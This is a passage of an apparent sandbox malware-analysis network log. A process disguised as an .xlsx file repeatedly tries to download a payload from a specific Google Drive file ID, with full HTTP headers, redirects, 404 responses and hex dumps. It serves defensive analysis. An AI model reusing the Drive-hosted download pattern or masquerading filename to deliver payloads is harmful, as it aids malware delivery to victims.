                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        19192.168.2.849736142.250.181.1443928C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:34 UTC459OUTGET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:58:35 UTC1844INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC5y9Ls_0uWWG4a_qMg6miJaPIx57RaysFJKrU2LgzOhrfRGfCBussr-xIAURga4DwxR
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:34 GMT
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-kdrDnV6r3_lplXIAfzZ4HA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:58:35 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 63 68 74 6a 2d 4f 67 79 77 4c 4e 47 42 4f 35 39 49 31 56 7a 6b 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="chtj-OgywLNGBO59I1Vzkg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        20192.168.2.849742172.217.19.174443928C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:36 UTC417OUTGET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:58:37 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:37 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-T2P5FhBtOB-biswnaEr88A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        21192.168.2.849748142.250.181.1443928C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:39 UTC459OUTGET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:58:40 UTC1844INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC5kLglCmpi1M1uiYUtow5_xWVCFWt-dnI8y-hYx_XhV6FjvMrXJU7gxxu_s02NRgSw0
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:40 GMT
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: script-src 'nonce-IKqxiRuJi9j75EgjhG78mw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:58:40 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 54 4d 59 45 4c 38 68 38 46 50 48 7a 6b 70 4f 46 73 39 4a 58 59 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="TMYEL8h8FPHzkpOFs9JXYA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        22192.168.2.849758172.217.19.174443928C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:42 UTC417OUTGET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:58:43 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:42 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-zc33uYvXW_Maq6HRY2fF3w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        23192.168.2.849764142.250.181.1443928C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:44 UTC459OUTGET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:58:45 UTC1844INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC5ySmzlUQfiaa6_KDXJESL2cDQjTswUyr6T0y8HWTZE2E7G7ojaLZkjquJ_AvCFNKoG
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:45 GMT
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-4wdzbC-IeVjHfY9zt4ovsg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:58:45 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 35 6f 5f 2d 53 59 74 4d 47 70 76 61 47 38 73 41 74 42 38 69 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="H5o_-SYtMGpvaG8sAtB8iA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        24192.168.2.849771172.217.19.174443928C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:47 UTC417OUTGET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:58:48 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:48 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-vQMQnduumneXZ_l43aPvqg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        25192.168.2.849777142.250.181.1443928C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:50 UTC459OUTGET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:58:51 UTC1844INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC4jSESVVtciyM1x2PPtN-ZBJgeonaSh7COd5VA-a5cO-_NnXpuQA9_MZ7M8kAz8gLls
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:51 GMT
                                                        Content-Security-Policy: script-src 'nonce-n2sQLDlgYCtFP5QmtjCrLQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:58:51 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 64 47 4a 6b 65 49 36 34 47 68 70 5f 41 53 38 55 6b 67 72 49 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NdGJkeI64Ghp_AS8UkgrIg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        26192.168.2.849783172.217.19.174443928C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:53 UTC417OUTGET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
